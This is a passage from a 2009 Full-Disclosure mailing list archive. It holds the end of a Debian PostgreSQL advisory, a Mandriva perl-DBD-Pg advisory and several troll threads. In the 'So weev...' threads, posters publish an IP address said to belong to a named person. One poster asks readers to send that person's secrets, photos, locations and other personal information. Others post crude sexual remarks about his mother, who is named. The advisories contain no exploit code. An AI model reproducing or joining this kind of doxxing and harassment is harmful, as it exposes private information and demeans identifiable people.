c74d1313ac7310b77df6a34e0978caf5 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_i386.deb Size/MD5 checksum: 369600 d519996a3609b81be6419c8ee3639bd2 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 401870 e72a6a0b2e304e5ee2087bed10501996 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 286890 0ba5c32f9d96a8486ad828edb2c4b905 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 6259748 3d267fb7cdf05721794e1174cac4bae2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 280908 979b31d95ce39e0d87eec465b87ee85a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 267030 4fbaae87e88b0ebccb8c5ad76f5fae24 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 251622 77d2dddd72eeffc63d862442886f5cc5 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 723666 be907e37c3afb43bf86a1af33b490bc6 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 822416 b31511637397a103df97b13052a4b3a6 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 281942 728ddbd06895556817ffb1ccd8dfb884 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 486690 6315f80aca82a90f397172acc7e5e5fd http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 512586 556622b1019baa5fbbc836cb67da1831 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 275382 a87477409fd7290bf57d93f272cd970d http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_ia64.deb Size/MD5 checksum: 1870298 4eb8d0c4eeeacaa587f447a4148dc380 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 369386 f069d481ec70a73a85e2c2815758ced1 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 259156 a995763486976c61742dc3be17ea85e4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 247918 3650928d4b26439cd6bf17305fb00793 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 262758 2c88de6013633e95141e8ba3e4d71c87 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 1671072 cf33882208e4879c90c977b973755545 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 268810 85be3a52c15bd8715fc1bfa00eba7708 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 5553876 2632b0f0e3cf29fb4e8ea681ff09b02f http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 260724 ea7a52d06e5972870fe795a87dc8c539 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 271824 0a60e2563af5c5da3cfe81783100cb1e http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 571842 18b34ab1c54634ee259e6a787bfd0919 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 450492 8d3bca10fa23aebdf086ff412dea2a3c http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 449416 be1cc8fc1422d1f44536bc9a2b4422e4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_mips.deb Size/MD5 checksum: 807884 3a04c534b1558b022a443ab1442a54cf mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 262588 f29329c0c53ee930c0ae96d372035cb8 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 568030 50e67d2d80b9acd2a33a7af57ce28fbb http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 807864 8448fd744a35167d02042298a97f903d http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 1668570 ca20db947485b8a82d78668792a0ea8a http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 447668 e450142c7a52d0268850081da53ee2f4 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 260628 07f5d333447b1d51ab558dc28dd52c4d http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 247864 c1169d2d869806eb2e8e1850d4201749 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 271798 d4cb1d759b3d8b38d76d5b598e4c020f http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 268742 262454de97b99e4f3f209ae404b1f427 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 259126 19fd2ca05b0bb08b18ca397d7f04cfa9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 369450 5672e197e8184d008cba9cdc6eafdcf5 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 5203646 e1fffc4216cbdbc6a3eae3bee3b23abd http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_mipsel.deb Size/MD5 checksum: 449554 8eb95b6b897c48a6a490938915c402ce powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 248898 3e95ca309d8208e27495f7f0cd208646 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 1720440 b598c40ea5afa78b84f27fec6ea6805b http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 454880 483207936daf0d333f24db5845298b32 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 273188 d1d12a35918a9c1c6a61aa75f6421b55 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 374270 8d004381fec1e81675e840a2c5a88a36 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 269940 d35ffe1f102e659569d430d87e8cd8df http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 655332 0b00b3adad1e18acf28d468e586ce882 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 445492 3ce646399e05c078c25d79db08717238 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 264314 d51c3ad4d19bb37cc458473efcdcddaa http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 809424 b21c368784aba5f1eab78e433e14398f http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 5698764 2948a55a81f8dfb5dda2e5b4b0e87963 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 271352 ce4e853a390c79d0c5f70b3ae7100291 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_powerpc.deb Size/MD5 checksum: 262416 6eb6c36f7b64bf3990ba92fe9963f338 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 377882 8acd2e6a698050491912bd3f2d68a2d2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 614630 ebf558506b47d3b09cfe74289d1674a9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 463858 9cebbb1f5226c8b1a44888ba4abf58bd http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 272010 c13859216b2b7d43b4d7b3bbd9d8438a http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 272192 fab5f4c498788870fd5b54fd5a1e9582 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 259940 acbd95a41fb91d2e713fecd51c185d50 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 266672 83106482db57b645f339714d67f73c17 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 449232 d26a44aff1e9ce9114460d53e3a0c774 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 1707010 8f21c2c312d45692c175c8494f55943a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 809596 f15a97d969755e160e94c6ad817f4754 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 262854 a7c2ae1d7c31201e674bc3e27a90ed49 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 5742642 df7715a0d607605e1e9afd914c4f66e5 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_s390.deb Size/MD5 checksum: 249088 c0f0c1b3157a4c33eb151c59aa638944 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq-dev_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 434760 6fa671104e50df7dc22e1ca4889e4310 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-dev_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 440726 1226f3e0278d09ef570551333046a515 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-client-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 1652128 fdb4b1c8fd5fe21f74e9a285948ba01a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plperl-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 265360 18ad96b5e437f31e960ea41d9d24d9e2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-pltcl-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 258358 71e1bceaf9ae427ac275180bf57d02d9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-server-dev-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 807260 343e7aebce4072b417c0b5dbdf0c58b2 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpgtypes3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 266856 a0f197c2e2ee05845cc700847969cab9 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg6_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 267094 6ef8b2fd622165d276686c26173d631a http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-contrib-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 565574 b88abc1b88934c72e459e08804653375 http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-plpython-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 259808 0ba43dc6b37614d1178ac0be1839afa1 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libpq5_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 367396 a00740a5b4483b797005eb130584e5de http://security.debian.org/pool/updates/main/p/postgresql-8.3/postgresql-8.3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 5440464 c0fd556c057a9734105b961e212d9713 http://security.debian.org/pool/updates/main/p/postgresql-8.3/libecpg-compat3_8.3.8-0lenny1_sparc.deb Size/MD5 checksum: 247460 55c93c096ecabc5376468eaa0756aeb8 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJKxk9NAAoJEL97/wQC1SS+QbsIAK3s94pX2KbN+8ThD5ofGKIu L37t6Hsq3Jqvxhydq+keJBJNpzpDwkmjr+TohOg+hP1I4Cy0/cQSux+wtasp6isC lqLiJxNpy2BBpxCZbj41j0ksrjzmMTLLtiGPMvXlyBVVh+n4DqZmaJ3ci5Cgq6/F B2K7AVWv8zzXNHdFBCa7rXSphs5BBAy2LJ1+l3KwG195IBR13H/HBOx0nuV/nCJV mjDfmGODA3jI6gAMResbavI8B/93NWhL314cm3W1CHS2qydzuPkwSdQaZp7vz/3o OpCsvjXJWjuQ2yJpvv3/Mc6THVsqE2cIvbM1jHW2p83O8jEcRcdjwvFle8BPjc0= =E3hD -----END PGP SIGNATURE----- From burningcows at gmail.com Fri Oct 2 20:46:40 2009 From: burningcows at gmail.com (Stuart Dunkeld) Date: Fri, 2 Oct 2009 20:46:40 +0100 Subject: [Full-disclosure] Please ban the Trolls. In-Reply-To: <20091002175945.4317928039@smtp.hushmail.com> References: <20091002175945.4317928039@smtp.hushmail.com> Message-ID: 1/10 Must Try Harder. On Fri, Oct 2, 2009 at 6:59 PM, wrote: > don't stop at n3td3v ban the others as well. > > thank me later, > > the full-censorship movement > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From full-censorship at hushmail.com Fri Oct 2 21:08:06 2009 From: full-censorship at hushmail.com (full-censorship at hushmail.com) Date: Fri, 02 Oct 2009 21:08:06 +0100 Subject: [Full-disclosure] THE FULL-CENSORSHIP MOVEMENT Message-ID: <20091002200806.7A284118038@smtp.hushmail.com> THE FULL-CENSORSHIP MOVEMENT OUR GOALS * we are a movement of security professionals who will complain about every troll * we believe anybody who offends us should be banned * we will not stop until every troll is banned PAST ACHIEVEMENT * we forced n3td3v to be banned mean as we go on now to get the rest banned CALL FOR MEMBERS * we want every security professional to rise up against full- disclosure trolls and get them banned WORKING GROUP * we would like to create a working task group of all the major email providers to collaborate IP intelligence From security at mandriva.com Fri Oct 2 21:16:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Fri, 02 Oct 2009 22:16:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:255 ] perl-DBD-Pg Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:255 http://www.mandriva.com/security/ _______________________________________________________________________ Package : perl-DBD-Pg Date : October 2, 2009 Affected: Corporate 4.0 _______________________________________________________________________ Problem Description: A vulnerability was discovered and corrected in perl-DBD-Pg: Heap-based buffer overflow in the DBD::Pg module for Perl might allow context-dependent attackers to execute arbitrary code via unspecified input to an application that uses the getline and pg_getline functions to read database rows. This update provides a fix for this vulnerability. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0663 _______________________________________________________________________ Updated Packages: Corporate 4.0: e3c38bea68b6e9fe28cc153b3c948c4b corporate/4.0/i586/perl-DBD-Pg-1.43-2.1.20060mlcs4.i586.rpm 4bc29785b1dfd8449775ddbbcce697f6 corporate/4.0/SRPMS/perl-DBD-Pg-1.43-2.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 341998c53e860a0ea02c32fb62baa8e0 corporate/4.0/x86_64/perl-DBD-Pg-1.43-2.1.20060mlcs4.x86_64.rpm 4bc29785b1dfd8449775ddbbcce697f6 corporate/4.0/SRPMS/perl-DBD-Pg-1.43-2.1.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKxjTBmqjQ0CJFipgRAhTNAKDAB0XF9hjSLVxqTBaX3MyaHs8W7ACgkH+k N7B+FB3d030VS5wVduuznjM= =Tbye -----END PGP SIGNATURE----- From vulcanius at gmail.com Fri Oct 2 21:38:55 2009 From: vulcanius at gmail.com (vulcanius) Date: Fri, 2 Oct 2009 16:38:55 -0400 Subject: [Full-disclosure] THE FULL-CENSORSHIP MOVEMENT In-Reply-To: <20091002200806.7A284118038@smtp.hushmail.com> References: <20091002200806.7A284118038@smtp.hushmail.com> Message-ID: Who is we? Weren't you calling for n3td3v to be allowed back not long ago? Do you see the irony in your message? I know how you can get at least one troll off the list, unsubscribe. On Fri, Oct 2, 2009 at 4:08 PM, wrote: > THE FULL-CENSORSHIP MOVEMENT > > OUR GOALS > > * we are a movement of security professionals who will complain > about every troll > > * we believe anybody who offends us should be banned > > * we will not stop until every troll is banned > > PAST ACHIEVEMENT > > * we forced n3td3v to be banned mean as we go on now to get the > rest banned > > CALL FOR MEMBERS > > * we want every security professional to rise up against full- > disclosure trolls and get them banned > > WORKING GROUP > > * we would like to create a working task group of all the major > email providers to collaborate IP intelligence > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From full-censorship at hushmail.com Fri Oct 2 23:16:27 2009 From: full-censorship at hushmail.com (full-censorship at hushmail.com) Date: Fri, 02 Oct 2009 23:16:27 +0100 Subject: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list Message-ID: <20091002221627.D027EB00B5@smtp.hushmail.com> we're making n3td3v a martyr of the full-disclosure mailing list. join hands in a circle and ban the other trolls in the name of our martyr. three cheers for our martyr!!! ban the trolls, ban the trolls, ban the trolls!!! vulcanius wrote: > Who is we? Weren't you calling for n3td3v to be allowed back not long > ago? Do you see the irony in your message? > > I know how you can get at least one troll off the list, unsubscribe. > > > wrote: >> THE FULL-CENSORSHIP MOVEMENT >> >> OUR GOALS >> >> * we are a movement of security professionals who will complain >> about every troll >> >> * we believe anybody who offends us should be banned >> >> * we will not stop until every troll is banned >> From gobbles1337 at Safe-mail.net Sat Oct 3 00:57:06 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Fri, 2 Oct 2009 19:57:06 -0400 Subject: [Full-disclosure] So weev... Message-ID: Hello. There is a strong likelihood chance we can get Andrew into prison for his criminal activity. Weev's affect hasn't just harassed innocents, but also came to the dismay of his former associates, who casted suspicion on due to his poor choices. If you have been victimized by Weev and no legal efforts or requests have worked, please submit any evidence you have to http://tips.fbi.gov. Also, if you have any personal information that is of any value including: - his secrets - personality - pictures - locations - methods of alluding law enforcement - your story of him harasses you or your friends - et cetera please mail them to me personally (or on this list). Thank you, and remember that n3td3v and Gary McKinnon always has the finest in intelligence. -------- Original Message -------- From: Nobody Special Apparently from: full-disclosure-bounces at lists.grok.org.uk To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 07:24:35 -0700 (PDT) > > 216.12.127.190 > > Enjoy. He's been using this IP address for awhile. > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091002/e4185a3e/attachment.html From mrxisaplant at hush.com Sat Oct 3 01:07:14 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sat, 03 Oct 2009 00:07:14 +0000 Subject: [Full-disclosure] n3td3v the new age martyr of the full-disclosure mailing list Message-ID: <20091003000714.9FC43B00B2@smtp.hushmail.com> http://www.youtube.com/watch?v=apEuFdzP5ZU This will not stand. The Information Security community has absolutely no tolerance for censorship. - AntiSec On Fri, 02 Oct 2009 22:16:27 +0000 full-censorship at hushmail.com wrote: >we're making n3td3v a martyr of the full-disclosure mailing list. > >join hands in a circle and ban the other trolls in the name of our > >martyr. > >three cheers for our martyr!!! ban the trolls, ban the trolls, ban > >the trolls!!! > >vulcanius wrote: >> Who is we? Weren't you calling for n3td3v to be allowed back not > >long >> ago? Do you see the irony in your message? >> >> I know how you can get at least one troll off the list, >unsubscribe. >> >> >> wrote: >>> THE FULL-CENSORSHIP MOVEMENT >>> >>> OUR GOALS >>> >>> * we are a movement of security professionals who will complain >>> about every troll >>> >>> * we believe anybody who offends us should be banned >>> >>> * we will not stop until every troll is banned >>> > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From gobbles1337 at Safe-mail.net Sat Oct 3 01:08:02 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Fri, 2 Oct 2009 20:08:02 -0400 Subject: [Full-disclosure] So weev... Message-ID: Hello, I think there is a good chance we can get Andrew into prison for his criminal activity. Weev's affect hasn't just harassed innocents, but also came to the dismay of his former associates, who casted suspicion on due to his poor choices. If you have been victimized by Weev and no legal efforts or requests have worked, please submit any evidence you have to http://tips.fbi.gov. Also, if you have any personal information that is of any value including: - his secrets - personality - pictures - locations - methods of alluding law enforcement - et cetera please mail them to me personally (or on this list). From gobbles1337 at Safe-mail.net Sat Oct 3 01:14:01 2009 From: gobbles1337 at Safe-mail.net (GOBBLES) Date: Fri, 2 Oct 2009 20:14:01 -0400 Subject: [Full-disclosure] So weev... Message-ID: This is about fighting crime. Not about putting your stuff into the alleged suspect's mother. Please have some sense of courtesy and professionalism. *ISRAEL* Internet Sleuth, Richard Anderson, Electronic Lawyer -------- Original Message -------- From: BMF To: GOBBLES Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 17:08:40 -0700 > On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES wrote: > > > > > > There is a strong likelihood chance we can get Andrew into prison for his criminal activity. > > > > > Sweet! I love to send people to Federal "Pound me in the ass" Prison! While Bubba is fudgin' this "weev" character I can be fudgin' his momma! > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091002/c2347e89/attachment.html From badmotherfsckr at gmail.com Sat Oct 3 01:08:40 2009 From: badmotherfsckr at gmail.com (BMF) Date: Fri, 2 Oct 2009 17:08:40 -0700 Subject: [Full-disclosure] So weev... In-Reply-To: References: Message-ID: On Fri, Oct 2, 2009 at 4:57 PM, GOBBLES wrote: > There is a strong likelihood chance we can get Andrew into prison for his > criminal activity. > Sweet! I love to send people to Federal "Pound me in the ass" Prison! While Bubba is fudgin' this "weev" character I can be fudgin' his momma! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091002/41d1e100/attachment.html From badmotherfsckr at gmail.com Sat Oct 3 01:19:14 2009 From: badmotherfsckr at gmail.com (BMF) Date: Fri, 2 Oct 2009 17:19:14 -0700 Subject: [Full-disclosure] So weev... In-Reply-To: References: Message-ID: On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES wrote: > This is about fighting crime. Not about putting your stuff into the alleged > suspect's mother. > > Please have some sense of courtesy and professionalism. Bwahahahha...someone who posts other peoples dirty laundry and pics of his family and goes by the name "GOBBLES" (as in gobbles knobs) is lecturing ME on courtesy and professionalism? You don't care one wit about crime or professionalism. Now if you'll excuse me I gotta go beat off to this pic of his momma you posted...say, got any pics of your momma? From badmotherfsckr at gmail.com Sat Oct 3 01:22:51 2009 From: badmotherfsckr at gmail.com (BMF) Date: Fri, 2 Oct 2009 17:22:51 -0700 Subject: [Full-disclosure] So weev... In-Reply-To: References: Message-ID: On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES wrote: > Not about putting your stuff into the alleged suspect's mother. Also: Isn't it way late to start using words like "alleged"? You have already definitively stated that he has done the deeds. What's the point? From mrxisaplant at hush.com Sat Oct 3 02:21:17 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sat, 03 Oct 2009 01:21:17 +0000 Subject: [Full-disclosure] So weev... Message-ID: <20091003012118.340B3118036@smtp.hushmail.com> I don't see how mirroring information about weev -- that was already posted by someone else -- signifies I don't care about crime. I believe you're being a relativist. I feel your miffed I care too much about justice and not enough about your sociopathic troll persona. Have a warm cup of soothing tea (cognitive dissonance is a bitch), and listen, because I'm going to help you: Now if you really wish, we can get you two on a date. However, you have to shape up that attitude, she looks like a real wholesome woman who wouldn't be impressed by latest emails. They are lurid! She is a woman who no doubt wants a smart man who works hard. I'm sure she loves her husband! TheiProphet said that her mom wanted an "intellectual friend, not a kid". And that his dead was "totally absent" You have a chance of getting with Andrew Auernheimer's (AKA Weev's) mom, Cathy, however you need to lighten up that nihilistic troll rhetoric. I need you to rent a tuxedo, get on SILC, and we'll start greasing the wheels. We got success ahead! And remember, n3td3v is True Intelligence in an Open world. -------- Original Message -------- From: BMF To: GOBBLES Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] So weev... Date: Fri, 2 Oct 2009 17:19:14 -0700 > On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES wrote: > > This is about fighting crime. Not about putting your stuff into the alleged > > suspect's mother. > > > > Please have some sense of courtesy and professionalism. > > Bwahahahha...someone who posts other peoples dirty laundry and pics of > his family and goes by the name "GOBBLES" (as in gobbles knobs) is > lecturing ME on courtesy and professionalism? You don't care one wit > about crime or professionalism. Now if you'll excuse me I gotta go > beat off to this pic of his momma you posted...say, got any pics of > your momma? From mrxisaplant at hush.com Sat Oct 3 02:26:37 2009 From: mrxisaplant at hush.com (TheLearner) Date: Sat, 03 Oct 2009 01:26:37 +0000 Subject: [Full-disclosure] So weev... Message-ID: <20091003012637.B5DEC28039@smtp.hushmail.com> My emails are not to be read hypercritically. Rather, you should get the point as whole. http://tips.fbi.gov <= Are you an 'alleged' victim of weev (Now disclosed to be known as Andrew Auernheimer)? Help want to change this, and to do that, we need you to report your experiences to the federal bureau of investigation. Thank you. On Sat, 03 Oct 2009 00:22:51 +0000 BMF wrote: >On Fri, Oct 2, 2009 at 5:14 PM, GOBBLES mail.net> wrote: >> Not about putting your stuff into the alleged suspect's mother. > >Also: Isn't it way late to start using words like "alleged"? You >have >already definitively stated that he has done the deeds. What's the >point? > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From wintermute at hush.com Sat Oct 3 02:42:07 2009 From: wintermute at hush.com (Wintermute) Date: Fri, 02 Oct 2009 20:42:07 -0500 Subject: 